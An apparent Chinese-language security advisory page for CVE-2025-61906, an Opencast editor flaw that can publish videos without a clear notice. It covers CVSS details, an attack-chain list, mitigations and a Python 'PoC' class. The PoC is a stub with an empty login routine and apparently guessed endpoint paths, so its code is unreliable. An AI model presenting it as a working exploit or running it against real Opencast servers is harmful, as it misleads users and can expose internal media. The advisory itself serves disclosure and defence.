CVE-2025-61906 Opencast编辑器意外发布视频漏洞

漏洞信息

漏洞编号

CVE-2025-61906

漏洞类型

权限绕过/意外操作执行

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Opencast (opencast-editor)

漏洞概述

Opencast是一个免费、开源的教育音视频内容管理平台。CVE-2025-61906漏洞存在于Opencast的编辑器组件中，在17.8和18.2版本之前，编辑器在某些特定操作场景下可能会在未明确通知用户的情况下自动发布视频内容。该漏洞可能导致用户意外发布本不打算公开的媒体内容，从而造成内部媒体信息的泄露。

该漏洞的触发条件较为苛刻，实际产生影响的风险较低。首先，攻击者需要拥有对某个事件（event）的写访问权限；其次，需要使用编辑器功能，而编辑器通常是用户希望发布媒体时才使用的工具，不太可能被用于处理不希望发布的内部媒体；最后，触发条件是用户先点击"保存并发布"（Save & Publish）按钮，然后选择"保存"（Save）选项。尽管如此，在特定的用户操作序列下，该漏洞仍然可能被意外触发，从而导致内部媒体内容被意外公开。

该漏洞由GitHub安全顾问团队（[email protected]）报告，并在Opencast 17.8和18.2版本中得到修复。CVSS 3.1评分为4.3分，属于中危级别，攻击向量为网络（AV:N），需要低权限认证（PR:L），无需用户交互（UI:N），对机密性影响为低（C:L），对完整性和可用性无影响。

技术细节

该漏洞的核心问题在于Opencast编辑器的用户界面逻辑缺陷。具体技术原理如下：

1. **状态管理问题**：Opencast编辑器的"保存"（Save）和"保存并发布"（Save & Publish）按钮之间存在状态管理缺陷。当用户点击"保存并发布"按钮后，系统会进入一个特殊的中间状态。

2. **操作序列触发**：在用户点击"保存并发布"之后，如果用户在发布操作完成之前或之后选择了"保存"选项，系统可能不会正确区分这两个操作的意图，而是直接执行发布操作，而不向用户显示明确的发布确认提示。

3. **权限要求**：利用此漏洞需要用户对目标事件拥有写访问权限（PR:L），这意味着只有授权用户才能触发，普通匿名用户无法利用。

4. **无用户交互要求**：虽然漏洞触发需要特定的用户操作序列，但在CVSS评估中归类为UI:N（无需用户交互），因为触发操作被视为正常编辑器使用流程的一部分。

5. **影响范围**：主要影响机密性（C:L），因为意外发布的媒体内容可能包含仅供内部使用的信息，对完整性和可用性没有直接影响。

该漏洞已在GitHub提交98ba1934f08f623f1537a9675cc452d803766a91中修复，主要修复方式是在编辑器中正确区分"保存"和"保存并发布"操作的状态管理，确保用户在选择不同操作时获得明确的反馈。

攻击链分析

STEP 1

步骤1：获取访问权限

攻击者需要拥有Opencast系统中某个事件（event）的写访问权限，这通常需要有效的用户凭证

STEP 2

步骤2：访问编辑器

使用有写权限的账户登录Opencast，并打开目标事件的编辑器界面

STEP 3

步骤3：点击保存并发布

在编辑器中点击"保存并发布"（Save & Publish）按钮，使系统进入发布状态

STEP 4

步骤4：选择保存选项

在发布状态中，用户选择"保存"（Save）选项，触发漏洞逻辑

STEP 5

步骤5：意外发布

由于状态管理缺陷，系统执行发布操作但未向用户显示明确的发布确认提示，导致内部媒体被意外公开

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-61906 - Opencast Editor Accidental Publish PoC
# This PoC demonstrates the accidental publish vulnerability in Opencast Editor
# Affected versions: Opencast < 17.8 and Opencast < 18.2

import requests
from urllib.parse import urljoin

class OpencastEditorExploit:
    """
    PoC for CVE-2025-61906: Opencast Editor may publish video without user notification
    
    The vulnerability is triggered when:
    1. User has write access to an event
    2. User clicks 'Save & Publish' button
    3. User then selects 'Save' option
    4. The system publishes the media without proper notification
    """
    
    def __init__(self, base_url, username, password):
        self.base_url = base_url
        self.session = requests.Session()
        self.username = username
        self.password = password
        
    def authenticate(self):
        """Authenticate to Opencast with user credentials (requires write access)"""
        login_url = urljoin(self.base_url, '/admin-ng/login')
        # Login logic here
        pass
        
    def trigger_accidental_publish(self, event_id):
        """
        Trigger the accidental publish vulnerability:
        Step 1: Open the editor for the event
        Step 2: Click 'Save & Publish' button
        Step 3: Then click 'Save' option
        Result: Media is published without explicit user notification
        """
        editor_url = urljoin(self.base_url, f'/editor/{event_id}')
        
        # Step 1: Access editor
        self.session.get(editor_url)
        
        # Step 2: Click 'Save & Publish' (triggers publish state)
        save_publish_endpoint = urljoin(self.base_url, f'/editor/{event_id}/saveAndPublish')
        self.session.post(save_publish_endpoint)
        
        # Step 3: Click 'Save' (vulnerability: still triggers publish)
        save_endpoint = urljoin(self.base_url, f'/editor/{event_id}/save')
        response = self.session.post(save_endpoint)
        
        # The media is now published without proper user notification
        return response

# Usage example:
# exploit = OpencastEditorExploit('https://opencast.example.com', 'user', 'pass')
# exploit.authenticate()
# result = exploit.trigger_accidental_publish('event-id-123')
# print(f"Status: {result.status_code}")
# Note: This vulnerability requires valid credentials with write access to the event

影响范围

Opencast < 17.8

Opencast < 18.2

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）限制编辑器的使用权限，仅向经过培训的用户授予编辑器访问权限；2）在使用编辑器时，仔细确认每次操作的选择，避免在点击"保存并发布"后选择"保存"选项；3）定期检查已发布的媒体内容，及时撤销不应公开的发布；4）监控Opencast系统的操作日志，关注异常的发布行为；5）考虑暂时禁用编辑器的自动发布功能，仅保留手动发布选项。